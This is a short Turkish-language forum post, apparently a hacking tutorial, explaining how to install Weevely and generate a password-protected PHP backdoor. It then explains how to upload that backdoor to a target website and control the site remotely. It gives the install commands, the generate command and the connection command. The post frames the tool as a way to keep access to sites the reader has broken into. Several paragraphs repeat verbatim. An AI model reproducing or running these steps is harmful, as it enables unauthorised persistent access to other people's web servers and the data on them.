Selamlar. Weevely uzaktan yönetilebilir bir backdoor oluşturulmayı sağlayan bir araçtır. Hedef site shell yemediği zaman yada güzel bir siteye erişim sağladığınızda backdoor atılması ihtiyacı duyulduğunda weevely imdadınıza yetişiyor.
Kali kullanan arkadaşlar doğrudan weevely kurulumuna ihtiyaç duymaz terminal üzerinden çalıştırılabilir.
Basit bir kuruluma sahiptir aşamalarıyla aşağıda yazdığım gibi uygulayın.
Yukarıdaki aşamaları yaptıysanız bu ekrana ulaşacaksınız.
python3 weevely.py generate hexor <path>(bu kısımda oluşturulacak dosya yolunu belirtin. örneğin /root/backdoor.php)
bu kod sayesinde bir php dosyası oluşturdunuz ve bu php dosyasının içerisinde belirtiğiniz (hexor) şifresi ile uzaktan bağlantı kurulabilir şekilde ayarladınız.
tek aşama kaldı buda hedef siteye bu dosyayı yüklemek ve uzaktan çağırmak
örneğin; python3 weevely.py https://hexor.com/backdoor.php hexor
Kali kullanan arkadaşlar doğrudan weevely kurulumuna ihtiyaç duymaz terminal üzerinden çalıştırılabilir.
Basit bir kuruluma sahiptir aşamalarıyla aşağıda yazdığım gibi uygulayın.
Kod:
git clone https://github.com/epinna/weevely3
cd weevely3
pip3 install -r requirements.txt
python weevely.py
Yukarıdaki aşamaları yaptıysanız bu ekrana ulaşacaksınız.
python3 weevely.py generate hexor <path>(bu kısımda oluşturulacak dosya yolunu belirtin. örneğin /root/backdoor.php)
bu kod sayesinde bir php dosyası oluşturdunuz ve bu php dosyasının içerisinde belirtiğiniz (hexor) şifresi ile uzaktan bağlantı kurulabilir şekilde ayarladınız.
tek aşama kaldı buda hedef siteye bu dosyayı yüklemek ve uzaktan çağırmak
örneğin; python3 weevely.py https://hexor.com/backdoor.php hexor